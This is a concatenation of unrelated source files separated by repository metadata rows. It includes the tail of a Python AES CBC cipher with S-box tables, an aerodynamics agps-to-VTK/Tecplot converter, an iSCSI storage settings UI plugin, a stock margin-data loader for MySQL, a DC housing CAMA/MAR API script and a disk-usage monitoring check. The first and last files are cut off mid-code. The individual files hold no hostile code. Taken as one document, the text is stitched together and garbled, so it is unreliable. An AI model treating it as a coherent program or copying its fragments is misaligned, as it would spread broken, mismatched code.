self.cipher.encrypt_block(block)
data[offset:offset + block_size] = block
IV = block
self.IV = IV
return data.tostring()
def decrypt(self, data):
"""Decrypt data in CBC mode"""
block_size = self.block_size
if len(data) % block_size != 0:
raise ValueError("Ciphertext length must be multiple of 16")
data = array('B', data)
IV = self.IV
for offset in xrange(0, len(data), block_size):
ctext = data[offset:offset + block_size]
block = ctext[:]
self.cipher.decrypt_block(block)
# Perform CBC chaining
#for i in xrange(block_size):
# data[offset + i] ^= IV[i]
for i in xrange(block_size):
block[i] ^= IV[i]
data[offset:offset + block_size] = block
IV = ctext
#data[offset : offset+block_size] = block
self.IV = IV
return data.tostring()
def galois_multiply(a, b):
"""Galois Field multiplicaiton for AES"""
p = 0
while b:
if b & 1:
p ^= a
a <<= 1
if a & 0x100:
a ^= 0x1b
b >>= 1
return p & 0xff
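# Worked example: using the AES reduction polynomial 0x11b, the classic case from
# the FIPS-197 specification gives {57} x {83} = {c1}, i.e.
#   galois_multiply(0x57, 0x83) == 0xc1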
# Precompute the multiplication tables for encryption
gf_mul_by_2 = array('B', [galois_multiply(x, 2) for x in range(256)])
gf_mul_by_3 = array('B', [galois_multiply(x, 3) for x in range(256)])
# ... for decryption
gf_mul_by_9 = array('B', [galois_multiply(x, 9) for x in range(256)])
gf_mul_by_11 = array('B', [galois_multiply(x, 11) for x in range(256)])
gf_mul_by_13 = array('B', [galois_multiply(x, 13) for x in range(256)])
gf_mul_by_14 = array('B', [galois_multiply(x, 14) for x in range(256)])
####
# The S-box is a 256-element array, that maps a single byte value to another
# byte value. Since it's designed to be reversible, each value occurs only once
# in the S-box
#
# More information: http://en.wikipedia.org/wiki/Rijndael_S-box
aes_sbox = array(
'B',
'637c777bf26b6fc53001672bfed7ab76'
'ca82c97dfa5947f0add4a2af9ca472c0'
'b7fd9326363ff7cc34a5e5f171d83115'
'04c723c31896059a071280e2eb27b275'
'09832c1a1b6e5aa0523bd6b329e32f84'
'53d100ed20fcb15b6acbbe394a4c58cf'
'd0efaafb434d338545f9027f503c9fa8'
'51a3408f929d38f5bcb6da2110fff3d2'
'cd0c13ec5f974417c4a77e3d645d1973'
'60814fdc222a908846eeb814de5e0bdb'
'e0323a0a4906245cc2d3ac629195e479'
'e7c8376d8dd54ea96c56f4ea657aae08'
'ba78252e1ca6b4c6e8dd741f4bbd8b8a'
'703eb5664803f60e613557b986c11d9e'
'e1f8981169d98e949b1e87e9ce5528df'
'8ca1890dbfe6426841992d0fb054bb16'.decode('hex')
)
# This is the inverse of the above. In other words:
# aes_inv_sbox[aes_sbox[val]] == val
aes_inv_sbox = array(
'B',
'52096ad53036a538bf40a39e81f3d7fb'
'7ce339829b2fff87348e4344c4dee9cb'
'547b9432a6c2233dee4c950b42fac34e'
'082ea16628d924b2765ba2496d8bd125'
'72f8f66486689816d4a45ccc5d65b692'
'6c704850fdedb9da5e154657a78d9d84'
'90d8ab008cbcd30af7e45805b8b34506'
'd02c1e8fca3f0f02c1afbd0301138a6b'
'3a9111414f67dcea97f2cfcef0b4e673'
'96ac7422e7ad3585e2f937e81c75df6e'
'47f11a711d29c5896fb7620eaa18be1b'
'fc563e4bc6d279209adbc0fe78cd5af4'
'1fdda8338807c731b11210592780ec5f'
'60517fa919b54a0d2de57a9f93c99cef'
'a0e03b4dae2af5b0c8ebbb3c83539961'
'172b047eba77d626e169146355210c7d'.decode('hex')
)
# The Rcon table is used in AES's key schedule (key expansion)
# It's a pre-computed table of exponentation of 2 in AES's finite field
#
# More information: http://en.wikipedia.org/wiki/Rijndael_key_schedule
aes_Rcon = array(
'B',
'8d01020408102040801b366cd8ab4d9a'
'2f5ebc63c697356ad4b37dfaefc59139'
'72e4d3bd61c29f254a943366cc831d3a'
'74e8cb8d01020408102040801b366cd8'
'ab4d9a2f5ebc63c697356ad4b37dfaef'
'c5913972e4d3bd61c29f254a943366cc'
'831d3a74e8cb8d01020408102040801b'
'366cd8ab4d9a2f5ebc63c697356ad4b3'
'7dfaefc5913972e4d3bd61c29f254a94'
'3366cc831d3a74e8cb8d010204081020'
'40801b366cd8ab4d9a2f5ebc63c69735'
'6ad4b37dfaefc5913972e4d3bd61c29f'
'254a943366cc831d3a74e8cb8d010204'
'08102040801b366cd8ab4d9a2f5ebc63'
'c697356ad4b37dfaefc5913972e4d3bd'
'61c29f254a943366cc831d3a74e8cb'.decode('hex')
) | gpl-3.0 | -5,658,260,328,799,054,000 | 31.6778 | 79 | 0.61045 | false |
SaTa999/pyPanair | pyPanair/postprocess/agps_converter.py | 1 | 10619 | #!/usr/bin/env python
import numpy as np
import os
def read_column(file, firstline):
"""read a column from first line (e.g. n01c001) to *eof"""
column = list()
line = firstline
# register methods for faster evaluation
f_readline = file.readline
column_append = column.append
# read each line until *eof
while line:
line = f_readline().split()
if line[0] == "*eof":
break
column_append(line)
return column
def read_network(file, header):
"""read a network"""
network_n = int(header[0][1:3]) # get network number from the first header (e.g. 01 from n01c001)
# print("loading network no.", network_n)
network = list()
line = header
# register methods for faster evaluation
network_append = network.append
# read each line until next header
while line:
col = read_column(file, line)
network_append(col)
line = file.readline().split()
# break at the end of agps file
if not line:
break
# break when reaching the header for the next network (e.g. n02c001)
if not int(line[0][1:3]) == network_n:
break
network = np.array(network, dtype=float)
return network, line
def read_agps(inputfile="agps"):
# read the agps file and return a list of arrays containing data for each network
with open(inputfile, "r") as f:
# skip the header of the agps file
for _ in range(6):
f.readline()
line = f.readline().split()
f.readline() # skip the header of first network ("icol, x, y, z, cp1, cp2, cp3, cp4")
dat = []
while line:
net, line = read_network(f, line)
dat.append(net)
return dat
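# Usage sketch (assumes an "agps" result file in the working directory; the
# variable names are illustrative only):
#   networks = read_agps("agps")
#   first_net = networks[0]          # ndarray of shape (n_row, n_col, n_values)
#   x, y, z = first_net[0, 0, 1:4]   # coordinates of the first grid point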
def write_vtk(n_wake=0, outputname="agps", inputfile="agps"):
"""Write agps in the legacy paraview format (vtk)
All networks will be merged into one block
Therefore, user are advised to omit 'wakes' by specifying the 'n_wakes'"""
data = read_agps(inputfile) # read agps file & specify the number of networks to omit
print("n_wake = ", n_wake)
# write the header of the vtk file
vtk = "# vtk DataFile Version 2.0\n"
vtk += "scalar\n"
vtk += "ASCII\n"
vtk += "DATASET UNSTRUCTURED_GRID\n"
n_points = 0 # number of points in vtk file
n_cells = 0 # number of quadrilateral cells formed by the points
n_cp = data[0].shape[2] - 4
points = str() # coordinate of each point (x, y, z)
point_data = [str()] * n_cp # cp at each point (cp1, cp2, cp3, cp4)
cells = str() # ids of each quadrilateral cell (e.g. (0, n_col, n_col + 1, 1) for first cell)
for i in range(len(data) - n_wake):
net = data[i]
n_row = int(net.shape[0])
n_col = int(net.shape[1])
print("network {} shape: ".format(i + 1), net.shape)
base_square = np.array((0, n_col, n_col + 1, 1))
for j in range(n_row):
for k in range(n_col):
point = net[j, k]
# add coordinate of a point
points += "{0} {1} {2}\n".format(point[1], point[2], point[3])
# add cp data of a point
for l in range(n_cp):
point_data[l] += "{}\n".format(point[4 + l])
# add ids of a cell
if not j == n_row - 1 and not k == n_col - 1:
square = base_square + (j * n_col + k) + n_points
square = (str(p) for p in square)
cells += "4 " + " ".join(square) + "\n"
# add the number of points / cells
n_points += n_row * n_col
n_cells += (n_row - 1) * (n_col - 1)
# write the header of each block (POINTS, CELLS, CELLTYPES, POINT_DATA)
points = "POINTS {} float\n".format(n_points) + points
cells = "CELLS {0} {1}\n".format(n_cells, n_cells * 5) + cells
cell_types = "CELL_TYPES {}\n".format(n_cells) + "9\n" * n_cells
vtk += points + cells + cell_types + "POINT_DATA {}\n".format(n_points)
for l in range(n_cp):
vtk += "SCALARS cp{} float\nLOOKUP_TABLE default\n".format(l + 1) + point_data[l]
with open("{}.vtk".format(outputname), "w") as f:
f.write(vtk)
def write_vtm(n_wake=0, outputname="agps", inputfile="agps"):
"""convert agps networks to paraview unstructured grid
each network will become a different vtu file
to open all vtu files at the same time, open the vtm file with paraview"""
data = read_agps(inputfile) # read agps file & specify the number of networks to omit
print("n_wake = ", n_wake)
# write header of vtm file
vtm = "<?xml version=\"1.0\"?>\n"
vtm += "<VTKFile type=\"vtkMultiBlockDataSet\" version=\"1.0\" byte_order=\"LittleEndian\">\n"
vtm += " <vtkMultiBlockDataSet>\n"
for i in range(len(data) - n_wake):
# add dataset to vtm file
vtu_dir = "{}_vtu".format(outputname)
try:
os.mkdir(vtu_dir)
except OSError:
if not os.path.exists(vtu_dir):
raise
vtu_path = "{0}/{1}{2}.vtu".format(vtu_dir, outputname, i + 1)
vtm += " <DataSet index=\"network{0}\" file=\"{1}\"/>\n".format(i + 1, vtu_path)
# write header of vtu file
vtu = "<?xml version=\"1.0\"?>\n"
vtu += "<VTKFile type=\"UnstructuredGrid\" version=\"1.0\" byte_order=\"LittleEndian\">\n"
vtu += " <UnstructuredGrid>\n"
# write the header of the piece
net = data[i]
n_cp = net.shape[2] - 4
n_row = int(net.shape[0])
n_col = int(net.shape[1])
print("network {} shape: ".format(i), net.shape)
n_points = n_row * n_col
n_cells = (n_row - 1) * (n_col - 1)
vtu += " <Piece NumberOfPoints=\"{}\" NumberOfCells=\"{}\">\n".format(n_points, n_cells)
# format the agps data
points = str() # coordinate of each point (x, y, z)
cells = str() # ids of each quadrilateral cell (e.g. (0, n_col, n_col + 1, 1) for first cell)
base_square = np.array((0, n_col, n_col + 1, 1), dtype=int)
for j in range(n_row):
for k in range(n_col):
point = net[j, k]
# add coordinate of a point
points += "{0} {1} {2}\n".format(point[1], point[2], point[3])
# add ids of a cell
if not j == n_row - 1 and not k == n_col - 1:
square = base_square + (j * n_col + k)
square = (str(p) for p in square)
cells += " ".join(square) + "\n"
# add formatted agps data to vtu
vtu += " <PointData Scalars=\"scalars\">\n"
# add point_data to vtu
for l in range(n_cp):
vtu += " <DataArray type=\"Float32\" Name=\"cp{}\" format=\"ascii\">\n".format(l + 1)
vtu += " ".join(str(cp) for cp in net[:, :, 4 + l].ravel()) + "\n"
vtu += " </DataArray>\n"
vtu += " </PointData>\n"
# add points to vtu
vtu += " <Points>\n"
vtu += " <DataArray type=\"Float32\" Name=\"network{}\" NumberOfComponents=\"3\" " \
"format=\"ascii\">\n".format(i + 1)
vtu += points
vtu += " </DataArray>\n"
vtu += " </Points>\n"
# add cells to vtu
vtu += " <Cells>\n"
vtu += " <DataArray type=\"Int32\" Name=\"connectivity\" format=\"ascii\">\n"
vtu += cells
vtu += " </DataArray>\n"
vtu += " <DataArray type=\"Int32\" Name=\"offsets\" format=\"ascii\">\n"
vtu += " ".join(str(4 * (icell + 1)) for icell in range(n_cells)) + "\n"
vtu += " </DataArray>\n"
vtu += " <DataArray type=\"Int32\" Name=\"types\" format=\"ascii\">\n"
vtu += " ".join(str(9) for _ in range(n_cells)) + "\n"
vtu += " </DataArray>\n"
vtu += " </Cells>\n"
vtu += " </Piece>\n"
vtu += " </UnstructuredGrid>\n</VTKFile>\n"
with open(vtu_path, "w") as f:
f.write(vtu)
vtm += " </vtkMultiBlockDataSet>\n</VTKFile>"
with open("{}.vtm".format(outputname), "w") as f:
f.write(vtm)
def write_tec(n_wake=0, outputname="agps", inputfile="agps"):
"""convert agps networks to tecplot finite element quadrilaterals"""
data = read_agps(inputfile) # read agps file & specify the number of networks to omit
print("n_wake = ", n_wake)
# write header
n_headers = data[0].shape[2] # number of headers (e.g. 8 for "irow, x, y, z, cp1, cp2, cp3, cp4")
n_cp = n_headers - 4 # number of different cps in agps file
tec = "TITLE = \"AGPS 3D Finite Element Data\"\n"
tec += "VARIABLES = \"x\", \"y\", \"z\""
for i in range(n_cp):
tec += ", \"cp{}\"".format(i + 1)
tec += "\n"
# write each network as a block
for i in range(len(data) - n_wake):
# write the header of the block
net = data[i]
n_row = int(net.shape[0])
n_col = int(net.shape[1])
print("network {} shape: ".format(i + 1), net.shape)
n_points = n_row * n_col
n_elements = (n_row - 1) * (n_col - 1)
tec += "ZONE T=\"MIXED\", N={}, E={}, DATAPACKING=BLOCK," \
" ZONETYPE=FEQUADRILATERAL\n".format(n_points, n_elements)
# write coordinates (x, y, z) and cps (cp1, cp2, cp3, cp4) in each row
for l in range(1, n_headers):
element = net[:, :, l]
tec += " ".join(map(str, element.ravel())) + "\n"
# write the ids of each quadrilateral (e.g. (0, n_col, n_col + 1, 1) for first quadrilateral)
base_square = np.array((0, n_col, n_col + 1, 1)) + 1
# quads = str()
# for j in range(n_row-1):
# for k in range(n_col-1):
# square = base_square + (j * n_col + k)
# square = (str(p) for p in square)
# quads += " ".join(square) + "\n"
# same as the above code, but faster evaluation
quads = "\n".join("\n".join((" ".join((str(p) for p in (base_square + j * n_col + k))))
for k in range(n_col - 1))
for j in range(n_row - 1))
tec += quads
with open("{}.dat".format(outputname), "w") as f:
f.write(tec)
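# Typical usage sketch (assumes a PanAir "agps" result file in the working
# directory; the wake count and output name below are placeholders):
#   write_vtm(n_wake=4, outputname="wing", inputfile="agps")
#   write_tec(n_wake=4, outputname="wing", inputfile="agps")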
| mit | 7,905,887,637,318,669,000 | 41.880165 | 104 | 0.512289 | false |
jarod-w/ocsetup | ocsetup/plugins/storage_tab.py | 1 | 2968 | #!/usr/bin/python
# storage_tab.py - Copyright (C) 2012 CloudTimes, Inc.
# Written by Jarod.W <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA. A copy of the GNU General Public License is
# also available at http://www.gnu.org/copyleft/gpl.html.
import traceback
from ovirtnode.ovirtfunctions import log
from ovirtnode.iscsi import get_current_iscsi_initiator_name, \
set_iscsi_initiator
from ocsetup.wrapper_ovirtfunctions import PluginBase
from ocsetup.ocsetup_ui_widgets import ButtonList
from ocsetup.ocsetup_ui import WidgetBase, _
from ocsetup.datautil import refresh_window
class Plugin(PluginBase):
"""
    Plugin for the storage configuration page (iSCSI initiator settings).
"""
def __init__(self):
PluginBase.__init__(self, "Storage")
self.iscsi_initiator_label = None
self.iscsi_initiator_name_value = None
self.iscsi_button = None
def storage_apply(self, obj):
from ocsetup.ocsetup import ocs
log("enter storage apply")
set_iscsi_initiator(
ocs.page_Storage.iscsi_initiator_name_value_Entry.get_text())
def storage_reset(self, obj):
log("enter storage reset")
refresh_window(obj)
def form(self):
log("enter storage form function....")
try:
self.iscsi_initiator_label = WidgetBase(
"iscsi_initiator_label",
"Label",
"iSCSI Initiator Name:",
title=True)
self.iscsi_initiator_name_value = WidgetBase(
"iscsi_initiator_name_value", "Entry", "", "",
get_conf=get_current_iscsi_initiator_name)
self.iscsi_button = WidgetBase(
'iscsi_button', ButtonList, '',
params={'labels': [_('Apply'), _('Reset')],
'callback': [self.storage_apply, self.storage_reset]})
except:
log("Here some error happened.format ext: %s " %
traceback.format_exc())
return [
"Storage",
"Storage",
[
(self.iscsi_initiator_label, self.iscsi_initiator_name_value),
(WidgetBase('__', 'Label', vhelp=140),),
(self.iscsi_button,),
]]
def action(self):
pass
def get_plugin():
p = Plugin()
return p.form()
| gpl-2.0 | -7,529,631,513,802,328,000 | 33.114943 | 78 | 0.627695 | false |
cqychen/quants | quants/loaddata/skyeye_ods_invest_refer_sh_margins_detail.py | 1 | 2670 | #coding=utf8
import tushare as ts;
import pymysql;
import time as dt
from datashape.coretypes import string
from pandas.io.sql import SQLDatabase
import sqlalchemy
import datetime
from sqlalchemy import create_engine
from pandas.io import sql
import threading
import pandas as pd;
import sys
sys.path.append('../') # add the shared configuration / common-function directory to the path
from common_function import *
def create_table(table_name):
cmd='''
create table if not exists %s
(
        opDate VARCHAR (63) comment 'margin trading date'
        ,stockCode varchar (63) comment 'stock code'
        ,securityAbbr varchar (63) comment 'underlying security short name'
        ,rzye BIGINT comment 'financing balance today (CNY)'
        ,rzmre BIGINT comment 'financing buy amount today (CNY)'
        ,rzche BIGINT comment 'financing repayment amount today (CNY)'
        ,rqyl BIGINT comment 'securities lending balance today'
        ,rqmcl BIGINT comment 'securities lending sell volume today'
        ,rqchl BIGINT comment 'securities lending repayment volume today'
,PRIMARY KEY(stockCode,`opDate`)
,index(stockCode)
)DEFAULT CHARSET=utf8
'''%table_name
print (cmd)
run_mysql_cmd(cmd,conn)
def load_data_stock(stock_code):
'''
    :param stock_code: stock code whose margin-detail data will be loaded into MySQL
:return:
'''
    start_date = get_date_add_days(get_max_date_sh_margins_detail(stock_code), 1) # get the latest date already stored for this stock
    rs = ts.sh_margin_details(start=start_date, end=end_date, symbol=stock_code) # fetch the data
pd.DataFrame.to_sql(rs, table_name, con=conn, flavor='mysql', if_exists='append', index=False)
def load_data():
stock_code = get_stock_info().index
total_num = len(stock_code);
tempnum = 1;
for tmp_stock_code in stock_code:
tempnum = tempnum + 1
print(tempnum,tmp_stock_code)
load_data_stock(tmp_stock_code)
if __name__ == '__main__':
    #-------------------- set up basic info ---------------------------------
    print("-------------- loading daily SH margin details -----------------------------")
startTime=dt.time()
iphost,user,passwd=get_mysql_conn()
db='ods_data'
charset='utf8'
table_name='ods_invest_refer_sh_margins_detail'
conn = pymysql.connect(user=user, passwd=passwd,host=iphost, db=db,charset=charset)
end_date= dt.strftime('%Y-%m-%d',dt.localtime(dt.time()))
    #-------------------- script execution starts --------------------------------
create_table(table_name=table_name)
load_data()
endTime=dt.time()
print("---------------脚本运行完毕,共计耗费时间%sS------------------"%(endTime-startTime))
| epl-1.0 | -4,613,820,654,172,870,000 | 34.217391 | 98 | 0.577778 | false |
pfjel7/housing-insights | python/housinginsights/sources/cama.py | 1 | 8713 | # Script is deprecated, as of September 18, 2017.
# zoneUnitCount now calculated with LoadData's _get_residential_units()
#
from pprint import pprint
import os
import sys
import requests
from collections import OrderedDict
import csv
import datetime
PYTHON_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir, os.pardir))
sys.path.append(PYTHON_PATH)
from housinginsights.sources.base import BaseApiConn
from housinginsights.tools.logger import HILogger
logger = HILogger(name=__file__, logfile="sources.log")
class MarApiConn_2(BaseApiConn):
"""
API Interface to the Master Address Record (MAR) database.
Use public methods to retrieve data.
"""
BASEURL = 'http://citizenatlas.dc.gov/newwebservices/locationverifier.asmx'
def __init__(self, baseurl=None,proxies=None,database_choice=None, debug=False):
super().__init__(MarApiConn_2.BASEURL)
def get_data(self, square, lot, suffix):
"""
        Look up MAR information for a property identified by its SSL
        (square, suffix and lot).

        :param square: first (square) part of the SSL
        :type square: String.
        :param lot: second (lot) part of the SSL
        :type lot: String.
        :param suffix: square suffix letter (' ' when there is none)
        :type suffix: String.
        :returns: Dictionary of zone identifiers (anc, census_tract,
                  neighborhood_cluster, ward, zip) parsed from the api response.
        :rtype: dict
"""
params = {
'f': 'json',
'Square': square,
'Lot': lot,
'Suffix': suffix
}
result = self.get('/findAddFromSSL2', params=params)
if result.status_code != 200:
err = "An error occurred during request: status {0}"
logger.exception(err.format(result.status_code))
raise
mar_data = result.json()
if mar_data['returnDataset'] == {}:
            mar_returns = {'Warning': 'No MAR data available - property under construction - see AYB year'}
else:
entry = mar_data['returnDataset']['Table1'][0]
mar_returns = {'anc': entry['ANC'],
'census_tract': entry['CENSUS_TRACT'],
'neighborhood_cluster': entry['CLUSTER_'],
'ward': entry['WARD'],
'zip': entry['ZIPCODE']
}
return mar_returns
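# Example call (the square/lot values and the returned zone values are made-up
# placeholders; only the dictionary keys are fixed by the code above):
#   MarApiConn_2().get_data(square='0123', lot='0045', suffix=' ')
#   -> {'anc': 'ANC 2B', 'census_tract': '005600', 'neighborhood_cluster': 'Cluster 6',
#       'ward': 'Ward 2', 'zip': '20009'}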
class CamaApiConn(BaseApiConn):
"""
API Interface to the Computer Assisted Mass Appraisal - Residential (CAMA)
API, to obtain SSL numbers to use as input for the MarApiConn_2 and get
the corresponding housing and bedroom units.
"""
BASEURL = 'https://opendata.arcgis.com/datasets'
def __init__(self):
super().__init__(CamaApiConn.BASEURL)
def get_data(self):
"""
Grabs data from CAMA. Individual CAMA property retrieves zone_type data
from MAR api. Count number of housing units and bedroom units per zone.
Return the count data (in dictionary form) to be processed into csv
by get_csv() method.
"""
logger.info("Starting CAMA")
mar_api = MarApiConn_2()
result = self.get(urlpath='/c5fb3fbe4c694a59a6eef7bf5f8bc49a_25.geojson', params=None)
if result.status_code != 200:
err = "An error occurred during request: status {0}"
raise Exception(err.format(result.status_code))
cama_data = result.json()
logger.info(" Got cama_data. Length:{}".format(len(cama_data['features'])))
"""
Example of: anc_count = [OrderedDict([('zone_type', 'anc'), ('zone', 'ANC 2B'),
('housing_unit_count', 10), ('bedroom_unit_count', 10)], etc)]
"""
zone_types = ['anc', 'census_tract', 'neighborhood_cluster', 'ward', 'zip']
anc_count = []
census_count = []
cluster_count = []
ward_count = []
zipcode_count = []
"""
Take each CAMA property data and retrieve the MAR data.
"""
"""
Certain square values have four digits + a letter. (ex. 8888E)
Square would be the first four digits and suffix would be the letter.
SSL sometimes comes as 8 digit string without spacing in the middle.
"""
"""
CAMA data includes bldgs under construction. CAMA's data includes AYB of 2018
as of June 2017. We eliminate all data points that are under construction and
don't provide any housing units and bedrm at this time.
"""
for index, row in enumerate(cama_data['features']):
if (index % 1000 == 0):
print(" currently at index {}".format(index))
try:
current_year = int(datetime.date.today().strftime('%Y'))
#Skipping none values for units under construction
if row['properties']['AYB'] is not None and int(row['properties']['AYB']) > current_year:
continue
objectid = row['properties']['OBJECTID']
if len(row['properties']['SSL']) == 8:
square = row['properties']['SSL'][:4]
lot = row['properties']['SSL'][4:]
else:
square, lot = row['properties']['SSL'].split()
suffix = ' '
                if len(square) > 4:
                    suffix = square[-1]  # grab the trailing letter before truncating the square
                    square = square[:4]
mar_return = mar_api.get_data(square, lot, suffix)
''' Count the housing units and bedrooms '''
num_units = 0
if row['properties']['NUM_UNITS']: num_units = row['properties']['NUM_UNITS']
if num_units == 0:
num_units = 1
bedrm = row['properties']['BEDRM']
if bedrm == 0: bedrm = 1
if bedrm == None: bedrm = 0
for zone in zone_types:
if zone == 'anc': zone_count = anc_count
elif zone == 'census_tract': zone_count = census_count
elif zone == 'neighborhood_cluster': zone_count = cluster_count
elif zone == 'ward': zone_count = ward_count
elif zone == 'zip': zone_count = zipcode_count
if 'Warning' not in mar_return.keys():
flag = False
for dictionary in zone_count: #dictionary is {'zone_type': 'ANC', 'zone': 'ANC 8A', etc.}
if dictionary['zone'] == mar_return[zone]: #mar_return[ANC] is 'ANC 8A'
dictionary['housing_unit_count'] += num_units
dictionary['bedroom_unit_count'] += bedrm
flag = True
break
if not flag:
zone_count.append( OrderedDict([('zone_type', zone), ('zone', mar_return[zone]), ('housing_unit_count', num_units), ('bedroom_unit_count', bedrm)]) )
except Exception as e:
exc_type, exc_obj, exc_tb = sys.exc_info()
print(exc_type, "line", exc_tb.tb_lineno)
print("Error! SSL: ", row['properties']['SSL'], row['properties']['AYB'])
continue
return {'anc': anc_count, 'census_tract': census_count, 'neighborhood_cluster': cluster_count, 'ward': ward_count, 'zip': zipcode_count}
def get_csv(self):
"""
Takes the returned dictionary from get_data() and convert the information
into csv file and then save the csv file in
housing-insights/data/processed/zoneUnitCount
as zoneUnitCount_2017-05-30.csv.
"""
if not os.path.exists('../../../data/processed/zoneUnitCount'):
os.makedirs('../../../data/processed/zoneUnitCount')
data_processed_zoneUnitCount = os.path.join(PYTHON_PATH, os.pardir, 'data', 'processed', 'zoneUnitCount')
zone_data = self.get_data()
toCSV = []
date = datetime.date.today().strftime('%Y-%m-%d')
filename = os.path.join(data_processed_zoneUnitCount, 'zoneUnitCount_'+date+'.csv')
for key, value in zone_data.items():
toCSV.extend(value)
keys = toCSV[0].keys()
with open(filename, 'w') as output_file:
dict_writer = csv.DictWriter(output_file, keys)
dict_writer.writeheader()
dict_writer.writerows(toCSV)
if __name__ == '__main__':
# Pushes everything from the logger to the command line output as well.
my_api = CamaApiConn()
csvfile = my_api.get_csv()
| mit | -8,037,650,862,094,938,000 | 38.425339 | 177 | 0.553655 | false |
pmalczuk/python_scripts | disk.py | 1 | 7360 | #!/usr/bin/python2
import os, sys
import getopt, datetime
import platform
# automatically scale a byte count upward to a human-readable unit
def GetHumanReadable(size,precision=2):
suffixes=['B','KB','MB','GB','TB']
suffixIndex = 0
while size > 1024 and suffixIndex < 3:
suffixIndex += 1 #increment the index of the suffix
size = size/1024.0 #apply the division
return "%.*f%s"%(precision,size,suffixes[suffixIndex])
# find the mount point that contains a given path
def getmount(path):
path = os.path.realpath(os.path.abspath(path))
if path == '/boot/efi':
return path
while path != os.path.sep:
if os.path.ismount(path):
return path
path = os.path.abspath(os.path.join(path, os.pardir))
return path
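# Usage sketch (the result depends on the local mount table):
#   getmount('/var/log/audit') -> '/var/log/audit', '/var' or '/', whichever
#   ancestor directory is actually a mount point on this system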
# disk usage figures returned as a dictionary
def disk_usage(path):
st = os.statvfs(path)
free = st.f_bavail * st.f_frsize
total = st.f_blocks * st.f_frsize
used = (st.f_blocks - st.f_bfree) * st.f_frsize
used_percent=float(used)/total*100
itotal = st.f_files
ifree = st.f_ffree
iused = st.f_files - st.f_ffree
try: iused_percent=float(iused)/itotal*100
except:
iused_percent=1
return {path: {'total': total,'used': used,'free': free,'used_percent': used_percent, 'itotal': itotal,'ifree': ifree,'iused_percent': iused_percent, 'iused': iused}}
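# Shape of the returned structure (numbers are illustrative only):
#   disk_usage('/') -> {'/': {'total': ..., 'used': ..., 'free': ...,
#                             'used_percent': ..., 'itotal': ..., 'ifree': ...,
#                             'iused': ..., 'iused_percent': ...}}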
# remove duplicates from a list
def make_unique(original_list):
unique_list = []
[unique_list.append(obj) for obj in original_list if obj not in unique_list]
return unique_list
def usage():
print """python check_disk.py -p [--partition=] -w [--warning=] -c [--critical] -C [--icritical] -W [--iwarning] -m [--megabytes] --gwarning --gcritical
Example:
./check_disk.py -p / -w 10 -c 20 -p /boot -w 11 -c 21 -p /tmp -w 11 -c 22 -p /opt -p /var -p /var/log -p /var/log/audit -W 10 -C 5
Remember to give the warning/critical thresholds right after the corresponding fs, going from left to right, i.e.
./check_disk.py -p / -w 10 -c 20 -p /boot -w 11 -c 21 -p /tmp -W 10 -C 5 --gwarning 10 --gcritical 20 >>>> this is correct
./check_disk.py -p / -w 10 -c 20 -p /boot -p /tmp -W 10 -C 5 --gwarning 10 --gcritical 20 >>> this is not correct
"""
sys.exit()
def main():
partitions_args=[]
warnings_args=[]
criticals_args=[]
mega=0
try:
opts, args = getopt.getopt(sys.argv[1:], 'hw:c:p:W:C:m',
['help','warning=','critical=','partition=','iwarning=','icritical=','megabytes','gwarning=','gcritical='])
except getopt.GetoptError:
usage()
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
usage()
elif opt in ("-w", "--warning"):
warnings_args.append(int(arg))
elif opt in ("-c", "--critical"):
criticals_args.append(int(arg))
elif opt in ("-p", "--partition"):
partitions_args.append(arg)
elif opt in ("-W", "--iwarning"):
iwarning=int(arg)
elif opt in ("-C", "--icritical"):
icritical=int(arg)
elif opt in ("-m", '--megabytes'):
mega=1
elif opt in ('--gwarning'):
gwarn=int(arg)
elif opt in ('--gcritical'):
gcrit=int(arg)
else:
usage()
part_result=[]
new_warning=[]
new_critical=[]
part_not_distinct=[]
for partition in partitions_args:
        part_not_distinct.append(getmount(partition)) # resolve the mount point of each requested partition
    part_distinct=make_unique(part_not_distinct) # remove duplicate mount points
for mountpoint in part_distinct:
        part_result.append(disk_usage(mountpoint)) # collect usage for every existing mount point
#print warnings_args[partitions_args.index(mountpoint)]
try:
            new_warning.append(warnings_args[part_distinct.index(mountpoint)]) # per-partition warning threshold
            new_critical.append(criticals_args[part_distinct.index(mountpoint)]) # per-partition critical threshold
        except IndexError:
            new_warning.append(gwarn) # fall back to the global warning threshold
            new_critical.append(gcrit) # fall back to the global critical threshold
perfdata=""
outputOK=""
outputWARN=""
outputCRIT=""
outputINODE=""
i=0
crit=0
warn=0
try: gwarn,gcrit
except NameError as e:
pass
    # compute the results and build the output strings
    if mega == 0: # thresholds interpreted as percent used
for element in part_result:
for tag,value in element.items():
p_used=value['used_percent']
if p_used > float(new_critical[i]):
outputCRIT+=tag+"="+GetHumanReadable(value['free'])+" "
crit=1
elif p_used > float(new_warning[i]):
outputWARN+=tag+"="+GetHumanReadable(value['free'])+" "
warn=1
else:
outputOK+=tag+"="+GetHumanReadable(value['free'])+" "
                # check inode usage
if value['iused_percent'] > float(icritical):
outputINODE+=tag+" InodeCRIT "+format(value['iused_percent'],'.2f')+" "
crit=1
elif value['iused_percent'] > float(iwarning):
outputINODE+=tag+" InodeWARN "+format(value['iused_percent'],'.2f')+" "
warn=1
warning=float(new_warning[i])/100*value['total']/1024
critical=float(new_critical[i])/100*value['total']/1024
perfdata+=tag+"="+str(value['used']/1024)+"KB;"+format(warning,'.0f')+";"+format(critical,'.0f')+";0;"+str(value['total']/1024)+"; "
#output+=tag+"="+GetHumanReadable(value['used'])+" "
i+=1
    elif mega == 1: # thresholds given in megabytes
for element in part_result:
for tag,value in element.items():
used=value['used']/1024/1024
if used < new_critical[i]:
outputCRIT+=tag+"="+GetHumanReadable(value['free'])+" "
crit=1
elif used < new_warning[i]:
outputWARN+=tag+"="+GetHumanReadable(value['free'])+" "
warn=1
else:
outputOK+=tag+"="+GetHumanReadable(value['free'])+" "
                # check inode usage
if value['iused_percent'] > float(icritical):
outputINODE+=tag+" InodeCRIT "+format(value['iused_percent'],'.2f')+" "
crit=1
elif value['iused_percent'] > float(iwarning):
